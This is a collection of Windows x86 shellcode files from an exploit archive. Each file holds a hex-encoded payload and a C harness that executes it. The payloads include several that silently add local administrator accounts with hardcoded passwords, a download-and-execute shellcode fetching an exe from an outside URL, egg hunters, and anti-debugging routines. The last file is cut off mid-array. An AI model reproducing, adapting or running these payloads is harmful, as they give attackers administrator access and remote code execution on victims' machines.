-------------------------------------------------------------------------------- 1 | /* 2 | Title: generic win32 - add new local administrator 326 bytes 3 | Author: Anastasios Monachos (secuid0) - anastasiosm[at]gmail[dot]com 4 | Method: Dynamic opcode, encoded shellcode 5 | Tested on: WinXP Pro SP3 (EN) 32bit - Build 2600.100427-1636 and Build 2600.080413-2111 6 | Greetz: offsec team, inj3ct0r team, hdm 7 | */ 8 | #include 9 | #include 10 | #include 11 | 12 | char code[] = 13 | "\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b" 14 | "\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a" 15 | "\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25" 16 | "\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2" 17 | 
"\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c" 18 | "\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe" 19 | "\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc" 20 | "\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71" 21 | "\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f" 22 | "\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53" 23 | "\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e" 24 | "\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43" 25 | "\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6" 26 | "\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4" 27 | "\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6" 28 | "\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5" 29 | "\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41" 30 | "\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0" 31 | "\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3" 32 | "\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06" 33 | "\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9" 34 | "\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa"; 35 | 36 | int main(int argc, char **argv) 37 | { 38 | ((void (*)())code)(); 39 | printf("New local admin \tUsername: secuid0\n\t\t\tPassword: m0nk"); 40 | return 0; 41 | } -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Command_WinExec___Shellcode__104+_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; 2 | ; relocateable dynamic runtime assembly code example using hash lookup 3 | ; 4 | ; WinExec() with ExitThread() 5 | ; 104 bytes 6 | ; 7 | ; for testing: 8 | ; 9 | ; ml /c /coff /Cp wexec2.asm 10 | ; link /subsystem:windows /section:.text,w wexec2.obj 11 | ; 12 | ; wyse101 [at] gmail.com 13 | ; 14 | ; October 2006 15 | ; 16 | .386 17 
| .model flat,stdcall 18 | 19 | ROL_CONSTANT equ 5 20 | 21 | mrol macro iNum:req,iBits:req 22 | exitm <(iNum shl iBits) or (iNum shr (32-iBits))> 23 | endm 24 | 25 | mror macro iNum:req,iBits:req 26 | exitm <(iNum shr iBits) or (iNum shl (32-iBits))> 27 | endm 28 | 29 | hashapi macro szApi 30 | local dwApi 31 | 32 | dwApi = 0 33 | 34 | forc x,szApi 35 | dwApi = dwApi + '&x' 36 | dwApi = mrol(dwApi,ROL_CONSTANT) 37 | endm 38 | dwApi = mrol(dwApi,ROL_CONSTANT) 39 | dw (dwApi and 0ffffh) 40 | endm 41 | 42 | .code 43 | 44 | assume fs:nothing 45 | 46 | code_start: 47 | jmp load_data 48 | setup_parameters: 49 | pop ebp 50 | xor ecx,ecx 51 | push ecx ; ExitThread() exitcode 52 | push ecx ; SW_HIDE 53 | mov cl,(cmd_end-api_hashes) ; limit of 255 bytes per command 54 | inc byte ptr[ebp+ecx] 55 | lea eax,[ebp+(cmd_string-api_hashes)] 56 | push eax ; WinExec command string 57 | get_k32_base: 58 | mov cl,30h 59 | mov eax,fs:[ecx] 60 | mov eax,[eax+0ch] 61 | mov esi,[eax+1ch] 62 | lodsd 63 | mov ebx,[eax+08h] 64 | get_api_loop: 65 | mov eax,[ebx+3ch] 66 | mov eax,[ebx+eax+78h] 67 | lea esi,[ebx+eax+1ch] 68 | mov cl,3 69 | load_rva: 70 | lodsd 71 | add eax,ebx 72 | push eax 73 | loop load_rva 74 | pop ebp 75 | pop edi 76 | load_api: 77 | mov esi,[edi+4*ecx] 78 | add esi,ebx 79 | xor eax,eax 80 | cdq 81 | hash_api: 82 | lodsb 83 | add edx,eax 84 | rol edx,ROL_CONSTANT 85 | dec eax 86 | jns hash_api 87 | inc ecx 88 | mov eax,[esp+4] 89 | cmp dx,word ptr[eax] 90 | jne load_api 91 | pop eax 92 | movzx edx,word ptr[ebp+2*ecx-2] 93 | add ebx,[eax+4*edx] 94 | pop esi 95 | call ebx 96 | lodsw 97 | jmp get_k32_base 98 | load_data: 99 | call setup_parameters 100 | api_hashes: 101 | hashapi 102 | hashapi 103 | code_end: 104 | 105 | cmd_string db 'cmd /c echo hello,world>test.txt && notepad test.txt',0ffh 106 | cmd_end equ $-1 107 | 108 | end code_start 109 | 110 | ; milw0rm.com [2006-01-24] -------------------------------------------------------------------------------- 
/Win_x86/Windows_x86_-_Download_File__http:__www_ph4nt0m_org_a_exe__+_Execute__C:_a_exe__Shellcode__226+_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | \ ______________________WIN_SHELLCODE__________________________ 3 | / :: win32 download & exec shellcode :: 4 | \ :: by Darkeagle of Unl0ck Research Team [http://exploiterz.org] :: 5 | / :: to avoid 0x00 use ^^xor^^ }:> :: 6 | \ :: greets goes to: Sowhat, 0x557 guys, 55k7 guys, RST/GHC guys. :: 7 | / ::_____________________________cya______________________________:: 8 | \ 9 | */ 10 | 11 | 12 | #include 13 | #include 14 | 15 | unsigned char sh4llcode[] = 16 | "\xEB\x54\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x56\x8B\x76\x20\x03" 17 | "\xF5\x33\xC9\x49\x41\xAD\x33\xDB\x36\x0F\xBE\x14\x28\x38\xF2\x74" 18 | "\x08\xC1\xCB\x0D\x03\xDA\x40\xEB\xEF\x3B\xDF\x75\xE7\x5E\x8B\x5E" 19 | "\x24\x03\xDD\x66\x8B\x0C\x4B\x8B\x5E\x1C\x03\xDD\x8B\x04\x8B\x03" 20 | "\xC5\xC3\x75\x72\x6C\x6D\x6F\x6E\x2E\x64\x6C\x6C\x00\x43\x3A\x5C" 21 | "\x55\x2e\x65\x78\x65\x00\x33\xC0\x64\x03\x40\x30\x78\x0C\x8B\x40" 22 | "\x0C\x8B\x70\x1C\xAD\x8B\x40\x08\xEB\x09\x8B\x40\x34\x8D\x40\x7C" 23 | "\x8B\x40\x3C\x95\xBF\x8E\x4E\x0E\xEC\xE8\x84\xFF\xFF\xFF\x83\xEC" 24 | "\x04\x83\x2C\x24\x3C\xFF\xD0\x95\x50\xBF\x36\x1A\x2F\x70\xE8\x6F" 25 | "\xFF\xFF\xFF\x8B\x54\x24\xFC\x8D\x52\xBA\x33\xDB\x53\x53\x52\xEB" 26 | "\x24\x53\xFF\xD0\x5D\xBF\x98\xFE\x8A\x0E\xE8\x53\xFF\xFF\xFF\x83" 27 | "\xEC\x04\x83\x2C\x24\x62\xFF\xD0\xBF\x7E\xD8\xE2\x73\xE8\x40\xFF" 28 | "\xFF\xFF\x52\xFF\xD0\xE8\xD7\xFF\xFF\xFF" 29 | "http://h0nest.org/1.exe"; 30 | 31 | int main() 32 | { 33 | 34 | void (*c0de)(); 35 | printf("Win32 \"download & exec shellcode\"\n"); 36 | *(int*)&c0de = sh4llcode; 37 | c0de(); 38 | } 39 | 40 | // milw0rm.com [2005-12-23] -------------------------------------------------------------------------------- 
/Win_x86/Windows_x86_-_Egg_Omelet_SEH_Shellcode__Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | A small piece of shellcode written in assembler that can scan the user-land 2 | address space for small blocks of memory ("eggs") and recombine the eggs into 3 | one large block. When done, the large block is executed. This is useful when you 4 | can only insert small blocks at random locations into a process and not one 5 | contiguous large block containing your shellcode in one piece: this code will 6 | recombine the eggs to create your shellcode in the process and execute it. 7 | 8 | This version works only on Windows 32-bit platforms because it uses the Windows 9 | specific Structured Exception Handler (SEH) feature to handle access violations 10 | caused by scanning memory. 11 | 12 | More details can be found here: 13 | 14 | http://skypher.com/wiki/index.php?title=Shellcode/w32_SEH_omelet_shellcode 15 | http://code.google.com/p/w32-seh-omelet-shellcode/ 16 | backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-1.zip (2009-w32-SEH-omlet-shellcode-v0.2.zip) 17 | backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13507-2.zip (2009-w32-SEH-omlet-shellcode-older-versions.zip) 18 | 19 | I have not had a chance to test this newer version in a live exploit, so do 20 | let me know if you have a chance to use it. 
21 | 22 | Cheers, 23 | SkyLined 24 | 25 | # milw0rm.com [2009-03-16] -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Egghunter_Checksum_Routine_Shellcode__18_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ;Exploit Title: Shellcode Checksum Routine 2 | ;Date: Sept 1 2010 3 | ;Author: dijital1 4 | ;Software Link: http://www.ciphermonk.net/code/exploits/shellcode-checksum.asm 5 | ;Tested on: Omelet Hunter Shellcode in MSF 6 | ;"|------------------------------------------------------------------|" 7 | ;"| __ __ |" 8 | ;"| _________ ________ / /___ _____ / /____ ____ _____ ___ |" 9 | ;"| / ___/ __ \/ ___/ _ \/ / __ `/ __ \ / __/ _ \/ __ `/ __ `__ \ |" 10 | ;"| / /__/ /_/ / / / __/ / /_/ / / / / / /_/ __/ /_/ / / / / / / |" 11 | ;"| \___/\____/_/ \___/_/\__,_/_/ /_/ \__/\___/\__,_/_/ /_/ /_/ |" 12 | ;"| |" 13 | ;"| http://www.corelan.be:8800 |" 14 | ;"| security@corelan.be |" 15 | ;"| |" 16 | ;"|-------------------------------------------------[ EIP Hunters ]--|" 17 | ;" -= Egg Hunter Checksum Routine - dijital1 =- " 18 | 19 | [BITS 32] 20 | 21 | ;Author: Ron Henry - dijital1 22 | ;Email: rlh@ciphermonk.net 23 | ;Site: http://www.ciphermonk.net 24 | ;Greetz to Exploit-db and Team Corelan 25 | 26 | ;Ok... couple of assumptions with this code. First, we're using a single 27 | ;byte as the checksum which gives us a 1 in 255 or ~0.39% chance of a 28 | ;collision. 29 | ;We consider this a worthwhile risk given the overall size of the code; 18 bytes. 30 | 31 | ;There are a couple ways to implement this, but a good example is how it 32 | ;was used in Peter Van Eeckhoutte's omelet egghunter mixin that was recently 33 | ;added to the Metasploit Framework. 34 | 35 | ;We're using a 1 byte footer at the end of the shellcode that contains the 36 | ;checksum generated at shellcode creation. 
37 | 38 | ; Variables eax: accumulator 39 | ; edx: points to current byte in shellcode 40 | ; ecx: counter 41 | 42 | egg_size equ 0x7a ;we're testing 122 bytes in this instance 43 | 44 | find_egg: 45 | 46 | xor ecx, ecx ;zero the counter 47 | xor eax, eax ;zero the accumlator 48 | 49 | calc_chksum_loop: 50 | add al, byte [edx+ecx] ;add the byte to running total 51 | inc ecx ;increment the counter 52 | cmp cl, egg_size ;cmp counter to egg_size 53 | jnz calc_chksum_loop ;if it's not equal repeat 54 | 55 | test_ckksum: 56 | cmp al, byte [edx+ecx] ;cmp eax with 1 byte checksum 57 | jnz find_egg ;search for another egg if checksum is bogus -------------------------------------------------------------------------------- /Win_x86/Windows_x86_-_Eggsearch_Shellcode__33_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | ; win32 eggsearch shellcode, 33 bytes 2 | ; tested on windows xp sp2, should work on all service packs on win2k, win xp, win2k3 3 | ; (c) 2009 by Georg 'oxff' Wicherski 4 | 5 | [bits 32] 6 | 7 | marker equ 0x1f217767 ; 'gw!\x1f' 8 | 9 | start: 10 | xor edx, edx ; edx = 0, pointer to examined address 11 | 12 | address_loop: 13 | inc edx ; edx++, try next address 14 | 15 | pagestart_check: 16 | test dx, 0x0ffc ; are we within the first 4 bytes of a page? 17 | jz address_loop ; if so, try next address as previous page might be unreadable 18 | ; and the cmp [edx-4], marker might result in a segmentation fault 19 | 20 | access_check: 21 | push edx ; save across syscall 22 | push byte 8 ; eax = 8, syscall nr of AddAtomA 23 | pop eax ; ^ 24 | int 0x2e ; fire syscall (eax = 8, edx = ptr) 25 | cmp al, 0x05 ; is result 0xc0000005? (a bit sloppy) 26 | pop edx ; 27 | 28 | je address_loop ; jmp if result was 0xc0000005 29 | 30 | egg_check: 31 | cmp dword [edx-4], marker ; is our egg right before examined address? 
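jne address_loop ; if not, try next address

egg_execute:
inc ebx ; make sure, zf is not set
jmp edx ; we found our egg at [edx-4], so we can jmp to edx
--------------------------------------------------------------------------------
/Win_x86/Windows_x86_-_PEB!NtGlobalFlags_Shellcode__14_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c:
--------------------------------------------------------------------------------
/*

PEB!NtGlobalFlags ( 14 BYTES )
Author: Koshi
Description: Uses PEB method to determine whether a debugger is
attached to the running process or not. No 9x. :(
Length: 14 Bytes
Registers Used: EAX,ESI,ESP
Compiled: jpXV34dd3v09Fh

*/

/*

00401000 > 6A 70 PUSH 70
00401002 58 POP EAX
00401003 56 PUSH ESI
00401004 333464 XOR ESI,DWORD PTR SS:[ESP]
00401007 64:3376 30 XOR ESI,DWORD PTR FS:[ESI+30]
0040100B 3946 68 CMP DWORD PTR DS:[ESI+68],EAX
JE DebuggerPresent ( If equal debugger attached )
*/

#include <stdio.h>   /* printf; the listing had no header at all */

unsigned char Shellcode[] =
{"\x6A\x70\x58\x56\x33\x34\x64"
 "\x64\x33\x76\x30\x39\x46\x68"};

/*
 * Prints the byte sequence above as text; nothing here executes it.
 *
 * The original called `printf( Shellcode, sizeof(Shellcode) )`, i.e. used the
 * byte array itself as the format string (CERT FIO30-C): any '%' in the data
 * would make printf read arguments that were never passed. Printing through
 * a literal "%s" removes that hazard; for these particular bytes (all
 * printable, no '%') the output is unchanged. The size is printed with %zu
 * because sizeof yields a size_t, not an unsigned int.
 */
int main( int argc, char *argv[] )
{
    (void)argc;
    (void)argv;
    printf( "Shellcode is %zu bytes.\n", sizeof(Shellcode)-1 );
    printf( "%s", Shellcode );
    return 0;
}

// milw0rm.com [2009-02-24]
--------------------------------------------------------------------------------
/Win_x86/Windows_x86_-_PEB__Kernel32_dll__ImageBase_Finder__ASCII_Printable__Shellcode__49_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c:
--------------------------------------------------------------------------------
/*

PEB Kernel32.dll ImageBase Finder ( Ascii Printable )

Author: Koshi

Description: Uses PEB method to locate the ImageBase of Kernel32.dll
ONLY supports NT/2K/XP.. sorry no 9X. ImageBase will be
returned in EAX.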
No null bytes, obviously, so no need to 10 | encode really. 11 | 12 | Length: 49 Bytes 13 | Registers Used: eax,esi 14 | Compiled: j0X40PPPd3@0^V4L4@^V30VX^4P4L30XPVX^30VX^4X4P30VX 15 | 16 | */ 17 | 18 | /* 19 | 20 | 00401000 > $ 6A 30 PUSH 30 21 | 00401002 . 58 POP EAX 22 | 00401003 . 34 30 XOR AL,30 23 | 00401005 . 50 PUSH EAX 24 | 00401006 . 50 PUSH EAX 25 | 00401007 . 50 PUSH EAX 26 | 00401008 . 64:3340 30 XOR EAX,DWORD PTR FS:[EAX+30] 27 | 0040100C . 5E POP ESI 28 | 0040100D . 56 PUSH ESI 29 | 0040100E . 34 4C XOR AL,4C 30 | 00401010 . 34 40 XOR AL,40 31 | 00401012 . 5E POP ESI 32 | 00401013 . 56 PUSH ESI 33 | 00401014 . 3330 XOR ESI,DWORD PTR DS:[EAX] 34 | 00401016 . 56 PUSH ESI 35 | 00401017 . 58 POP EAX 36 | 00401018 . 5E POP ESI 37 | 00401019 . 34 50 XOR AL,50 38 | 0040101B . 34 4C XOR AL,4C 39 | 0040101D . 3330 XOR ESI,DWORD PTR DS:[EAX] 40 | 0040101F . 58 POP EAX 41 | 00401020 . 50 PUSH EAX 42 | 00401021 . 56 PUSH ESI 43 | 00401022 . 58 POP EAX 44 | 00401023 . 5E POP ESI 45 | 00401024 . 3330 XOR ESI,DWORD PTR DS:[EAX] 46 | 00401026 . 56 PUSH ESI 47 | 00401027 . 58 POP EAX 48 | 00401028 . 5E POP ESI 49 | 00401029 . 34 58 XOR AL,58 50 | 0040102B . 34 50 XOR AL,50 51 | 0040102D . 3330 XOR ESI,DWORD PTR DS:[EAX] 52 | 0040102F . 56 PUSH ESI 53 | 00401030 . 
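58 POP EAX

*/

#include <stdio.h>   /* printf; the listing had no header at all */

unsigned char Shellcode[] =
{"\x6A\x30\x58\x34\x30\x50\x50\x50"
 "\x64\x33\x40\x30\x5E\x56\x34\x4C"
 "\x34\x40\x5E\x56\x33\x30\x56\x58"
 "\x5E\x34\x50\x34\x4C\x33\x30\x58"
 "\x50\x56\x58\x5E\x33\x30\x56\x58"
 "\x5E\x34\x58\x34\x50\x33\x30\x56"
 "\x58"};

/*
 * Prints the byte sequence above as text; nothing here executes it.
 *
 * The original called `printf( Shellcode, sizeof(Shellcode) )`, using the
 * byte array as the format string (CERT FIO30-C); a '%' in the data would
 * make printf consume arguments that were never passed. A literal "%s"
 * format removes that hazard and, since these bytes contain no '%', prints
 * exactly the same text. %zu matches the size_t produced by sizeof.
 */
int main( int argc, char *argv[] )
{
    (void)argc;
    (void)argv;
    printf( "Shellcode is %zu bytes.\n", sizeof(Shellcode)-1 );
    printf( "%s", Shellcode );
    return 0;
}

// milw0rm.com [2008-09-03]
--------------------------------------------------------------------------------
/Win_x86/Windows_x86_-_user32!MessageBox__Hello_World!__Null-Free_Shellcode__199_bytes___Shellcode_exploit_for_Win_x86_platform/shellcode.c:
--------------------------------------------------------------------------------
/*
 * This file was automatically generated by mkhex.sh,
 * which, together with the complete
 * and heavily commented assembly source code
 * for this shellcode, is available at
 * https://github.com/NoviceLive/shellcoding.
 *
 * For those curious heads
 * striving to figure out what's under the hood.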
10 | * 11 | */ 12 | 13 | 14 | # include 15 | # include 16 | # include 17 | 18 | # include 19 | 20 | 21 | int 22 | main(void) 23 | { 24 | char *shellcode = "\x33\xc9\x64\x8b\x49\x30\x8b\x49\x0c\x8b" 25 | "\x49\x1c\x8b\x59\x08\x8b\x41\x20\x8b\x09" 26 | "\x80\x78\x0c\x33\x75\xf2\x8b\xeb\x03\x6d" 27 | "\x3c\x8b\x6d\x78\x03\xeb\x8b\x45\x20\x03" 28 | "\xc3\x33\xd2\x8b\x34\x90\x03\xf3\x42\x81" 29 | "\x3e\x47\x65\x74\x50\x75\xf2\x81\x7e\x04" 30 | "\x72\x6f\x63\x41\x75\xe9\x8b\x75\x24\x03" 31 | "\xf3\x66\x8b\x14\x56\x8b\x75\x1c\x03\xf3" 32 | "\x8b\x74\x96\xfc\x03\xf3\x33\xff\x57\x68" 33 | "\x61\x72\x79\x41\x68\x4c\x69\x62\x72\x68" 34 | "\x4c\x6f\x61\x64\x54\x53\xff\xd6\x33\xc9" 35 | "\x57\x66\xb9\x33\x32\x51\x68\x75\x73\x65" 36 | "\x72\x54\xff\xd0\x57\x68\x6f\x78\x41\x01" 37 | "\xfe\x4c\x24\x03\x68\x61\x67\x65\x42\x68" 38 | "\x4d\x65\x73\x73\x54\x50\xff\xd6\x57\x68" 39 | "\x72\x6c\x64\x21\x68\x6f\x20\x57\x6f\x68" 40 | "\x48\x65\x6c\x6c\x8b\xcc\x57\x57\x51\x57" 41 | "\xff\xd0\x57\x68\x65\x73\x73\x01\xfe\x4c" 42 | "\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78" 43 | "\x69\x74\x54\x53\xff\xd6\x57\xff\xd0"; 44 | 45 | DWORD why_must_this_variable; 46 | BOOL ret = VirtualProtect (shellcode, strlen(shellcode), 47 | PAGE_EXECUTE_READWRITE, &why_must_this_variable); 48 | 49 | if (!ret) { 50 | printf ("VirtualProtect\n"); 51 | return EXIT_FAILURE; 52 | } 53 | 54 | printf("strlen(shellcode)=%d\n", strlen(shellcode)); 55 | 56 | ((void (*)(void))shellcode)(); 57 | 58 | return EXIT_SUCCESS; 59 | } -------------------------------------------------------------------------------- /Windows/Windows_-_Add_Administrator_User__BroK3n_BroK3n__Null-Free_Shellcode__194_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | Add Admin User Shellcode (194 bytes) - Any Windows Version 2 | ======================================================== 3 | 4 | Title: Add Admin User Shellcode (194 bytes) - Any Windows Version 5 
| Release date: 21/06/2014 6 | Author: Giuseppe D'Amore (http://it.linkedin.com/pub/giuseppe-d-amore/69/37/66b) 7 | Size: 194 byte (NULL free) 8 | Tested on: Win8,Win7,WinVista,WinXP,Win2kPro,Win2k8,Win2k8R2,Win2k3 9 | Username: BroK3n 10 | Password: BroK3n 11 | 12 | char shellcode[] = "\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42" 13 | "\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03" 14 | "\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b" 15 | "\x34\xaf\x01\xc6\x45\x81\x3e\x57\x69\x6e\x45\x75\xf2\x8b\x7a" 16 | "\x24\x01\xc7\x66\x8b\x2c\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf" 17 | "\xfc\x01\xc7\x68\x4b\x33\x6e\x01\x68\x20\x42\x72\x6f\x68\x2f" 18 | "\x41\x44\x44\x68\x6f\x72\x73\x20\x68\x74\x72\x61\x74\x68\x69" 19 | "\x6e\x69\x73\x68\x20\x41\x64\x6d\x68\x72\x6f\x75\x70\x68\x63" 20 | "\x61\x6c\x67\x68\x74\x20\x6c\x6f\x68\x26\x20\x6e\x65\x68\x44" 21 | "\x44\x20\x26\x68\x6e\x20\x2f\x41\x68\x72\x6f\x4b\x33\x68\x33" 22 | "\x6e\x20\x42\x68\x42\x72\x6f\x4b\x68\x73\x65\x72\x20\x68\x65" 23 | "\x74\x20\x75\x68\x2f\x63\x20\x6e\x68\x65\x78\x65\x20\x68\x63" 24 | "\x6d\x64\x2e\x89\xe5\xfe\x4d\x53\x31\xc0\x50\x55\xff\xd7"; 25 | 26 | 27 | int main(int argc, char **argv){int (*f)();f = (int (*)())shellcode;(int)(*f)();} -------------------------------------------------------------------------------- /Windows/Windows_-_Add_Local_Administrator_User__RubberDuck_mudbath__+_ExitProcess_WinExec_Shellcode__279_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin WinExec add new local administrator + ExitProcess Shellcode - 279 bytes 3 | Date: 2011-05-25 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | -- command: cmd.exe /c net user RubberDuck mudbath /add && net localgroup administrators RubberDuck /add 8 | 
-- Username: RubberDuck 9 | -- Password: mudbath 10 | */ 11 | 12 | #include 13 | #include 14 | 15 | int main(){ 16 | unsigned char shellcode[]= 17 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 18 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 19 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 20 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 21 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 22 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 23 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 24 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 25 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 26 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 27 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 28 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 29 | "\x8E\x03\xD3\x52\x68\x78\x65\x63\x01\xFE" 30 | "\x4C\x24\x03\x68\x57\x69\x6E\x45\x54\x53" 31 | "\xFF\xD2\x6A\x05\xEB\x23\xFF\xD0\x68\x65" 32 | "\x73\x73\x01\x8B\xDF\xFE\x4C\x24\x03\x68" 33 | "\x50\x72\x6F\x63\x68\x45\x78\x69\x74\x54" 34 | "\xFF\x74\x24\x1C\xFF\x54\x24\x1C\x57\xFF" 35 | "\xD0\xE8\xD8\xFF\xFF\xFF\x63\x6D\x64\x2E" 36 | "\x65\x78\x65\x20\x2F\x63\x20\x6E\x65\x74" 37 | "\x20\x75\x73\x65\x72\x20\x52\x75\x62\x62" 38 | "\x65\x72\x44\x75\x63\x6B\x20\x6D\x75\x64" 39 | "\x62\x61\x74\x68\x20\x2F\x61\x64\x64\x20" 40 | "\x26\x26\x20\x6E\x65\x74\x20\x6C\x6F\x63" 41 | "\x61\x6C\x67\x72\x6F\x75\x70\x20\x61\x64" 42 | "\x6D\x69\x6E\x69\x73\x74\x72\x61\x74\x6F" 43 | "\x72\x73\x20\x52\x75\x62\x62\x65\x72\x44" 44 | "\x75\x63\x6B\x20\x2F\x61\x64\x64\x00"; 45 | LPVOID lpAlloc; 46 | void (*pfunc)(); 47 | 48 | printf("size = %i bytes\n", lstrlen(shellcode) + 1); 49 | printf("-------------------------\nUsername: RubberDuck\nPassword: mudbath\n"); 50 | system("PAUSE"); 51 | 52 | lpAlloc = VirtualAlloc(0, 4096, 53 | MEM_COMMIT, 54 | PAGE_EXECUTE_READWRITE); 55 | 56 | if(lpAlloc == NULL){ 57 | printf("Memory not allocated!\n"); 58 | return 0; 59 | } 60 | 61 | memcpy(lpAlloc, shellcode, lstrlen(shellcode) + 1); 62 | 63 | pfunc = lpAlloc; 64 | 65 | pfunc(); 66 | 67 | 
return 0; 68 | } -------------------------------------------------------------------------------- /Windows/Windows_-_MessageBoxA_Shellcode__238_bytes___Shellcode_exploit_for_Windows_platform/shellcode.c: -------------------------------------------------------------------------------- 1 | /* 2 | Title: Allwin MessageBoxA Shellcode 3 | Date: 2010-06-11 4 | Author: RubberDuck 5 | Web: http://bflow.security-portal.cz 6 | Tested on: Win 2k, Win 2003, Win XP Home SP2/SP3 CZ/ENG (32), Win Vista (32)/(64), Win 7 (32)/(64), Win 2k8 (32) 7 | Thanks to: kernelhunter, Lodus, Vrtule, Mato, cm3l1k1, eat, st1gd3r and others 8 | */ 9 | 10 | #include 11 | #include 12 | #include 13 | 14 | int main(){ 15 | unsigned char shellcode[]= 16 | "\xFC\x33\xD2\xB2\x30\x64\xFF\x32\x5A\x8B" 17 | "\x52\x0C\x8B\x52\x14\x8B\x72\x28\x33\xC9" 18 | "\xB1\x18\x33\xFF\x33\xC0\xAC\x3C\x61\x7C" 19 | "\x02\x2C\x20\xC1\xCF\x0D\x03\xF8\xE2\xF0" 20 | "\x81\xFF\x5B\xBC\x4A\x6A\x8B\x5A\x10\x8B" 21 | "\x12\x75\xDA\x8B\x53\x3C\x03\xD3\xFF\x72" 22 | "\x34\x8B\x52\x78\x03\xD3\x8B\x72\x20\x03" 23 | "\xF3\x33\xC9\x41\xAD\x03\xC3\x81\x38\x47" 24 | "\x65\x74\x50\x75\xF4\x81\x78\x04\x72\x6F" 25 | "\x63\x41\x75\xEB\x81\x78\x08\x64\x64\x72" 26 | "\x65\x75\xE2\x49\x8B\x72\x24\x03\xF3\x66" 27 | "\x8B\x0C\x4E\x8B\x72\x1C\x03\xF3\x8B\x14" 28 | "\x8E\x03\xD3\x52\x33\xFF\x57\x68\x61\x72" 29 | "\x79\x41\x68\x4C\x69\x62\x72\x68\x4C\x6F" 30 | "\x61\x64\x54\x53\xFF\xD2\x68\x33\x32\x01" 31 | "\x01\x66\x89\x7C\x24\x02\x68\x75\x73\x65" 32 | "\x72\x54\xFF\xD0\x68\x6F\x78\x41\x01\x8B" 33 | "\xDF\x88\x5C\x24\x03\x68\x61\x67\x65\x42" 34 | "\x68\x4D\x65\x73\x73\x54\x50\xFF\x54\x24" 35 | "\x2C\x57\x68\x4F\x5F\x6F\x21\x8B\xDC\x57" 36 | "\x53\x53\x57\xFF\xD0\x68\x65\x73\x73\x01" 37 | "\x8B\xDF\x88\x5C\x24\x03\x68\x50\x72\x6F" 38 | 